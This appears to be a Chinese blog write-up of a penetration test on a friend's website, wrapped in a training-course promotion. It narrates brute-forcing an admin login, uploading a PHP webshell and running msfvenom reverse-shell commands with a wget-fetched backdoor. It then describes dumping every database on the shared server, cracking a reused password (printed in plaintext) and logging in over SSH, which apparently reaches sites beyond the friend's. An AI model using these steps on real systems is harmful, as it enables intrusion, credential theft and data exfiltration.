本文涉及知識點實操練習-DoraBox之檔案上傳
https://www。hetianlab。com/expc。do?ec=ECIDfaf3-05da-4d49-9e11-72953b14f22c
&pk_campaign=weixin-wemedia
透過DoraBox靶場系列闖關練習,瞭解檔案上傳漏洞的基礎知識及如何進行繞過上傳惡意檔案。
前兩天我一個朋友給我發來一個連結,說他做的站準備上線,問我能不能做下測試,既然是朋友,那肯定義不容辭,準備開始搞事情。
先開啟網站瀏覽一下,發現直接跳轉到了登入頁面,如下:
簡單了嘗試了下弱口令、萬能密碼和登入框xss,發現輸入框對輸入內容做了嚴格的過濾,非法字元一概不允許,果斷放棄。
【——全網最全的網路安全學習資料包分享給愛學習的你,關注我,私信回覆“領取”獲取——】
1.網路安全多個方向學習路線
2.全網最全的CTF入門學習資料
3.一線大佬實戰經驗分享筆記
4.網安大廠面試題合集
5.紅藍對抗實戰技術秘籍
6.網路安全基礎入門、Linux、web安全、滲透測試方面影片
簡單掃描了一下敏感目錄,發現一個/adminx,果然這種開放註冊的站都會給管理員提供一個專門的登入入口。
(忽略這個 1。zip,那是我打包整站時留下的
嘗試爆破,弱口令一波帶走,進入後臺,趕緊把喜訊報告給朋友,讓他“驚喜”一下
尋找上傳點
進到後臺之後尋找上傳點,發現系統設定處有修改站點logo的功能,先傳個php小馬試試水
我當場就驚了,你後臺登入框過濾那麼嚴格結果你這上傳點就這就這??好歹做個本地校驗啊,你讓burpsuite面子往哪擱?
連線shell嘗試提權
傳了馬之後使用蟻劍連線,首先就是檢視伺服器資訊,這裡有個小插曲,開啟虛擬終端之後無論執行什麼命令,返回結果都是 ret=127
應該是伺服器上有什麼安全軟體做了過濾,使用蟻劍自帶的外掛進行bypass
成功繞過
不過蟻劍的這個繞過連線不太穩定,而且速度也很慢,於是琢磨著建立一個meterpreter會話嘗試提權。
建立meterpreter 會話
在雲伺服器上使用msfvenom生成一個後門:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=伺服器ip LPORT=監聽埠 -f elf > shell。elf
然後在伺服器設定一個監聽會話:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 伺服器ip
set LPORT 監聽埠
run
在伺服器上使用python建立一個簡單的http服務:
python3 -m http。server
在目標主機使用wget下載後門檔案並執行,成功獲取meterpreter會話
嘗試提權受阻
由於目標伺服器執行的是 CentOS 8。0,核心版本為 Linux 4。18。0,且我獲取到的僅為一個低許可權的shell,想要實現提權是很難的,在明知肯定失敗的情況下我還是嘗試了髒牛等所有的我手上能用的提權exp,均宣告失敗,也是意料之中的事。
柳暗花明又一村
提權無果之後,我開始翻動伺服器上的各種檔案,然後發現了不得了的線索,乖乖這是個站群啊
然後我從每個站的配置檔案中都得到了他們對應的資料庫以及資料庫賬號密碼,看樣子應該是隨機生成的,不像是會用作root使用者密碼的通用密碼,如下圖:
於是我上傳了一個脫褲馬,獲取到了所有的資料庫sql檔案,嘗試訪問所有的資料,以尋求一個可能的通用密碼,沒想到還真讓我找到了,在幾個採集站和髮卡站的庫中,我找到了如下相同的md5值:
md5解密後結果為:vip886。A
嘗試ssh連線伺服器,成功
至此滲透結束。
總結
弱口令以及通用密碼對於安全的危害還是很大的,另外上傳功能的處理也是很重要的,一丁點防護都沒有的上傳點我是真頭一回見。
漏洞報告已經交給我朋友啦,沒想到還有小錢錢拿,開心。
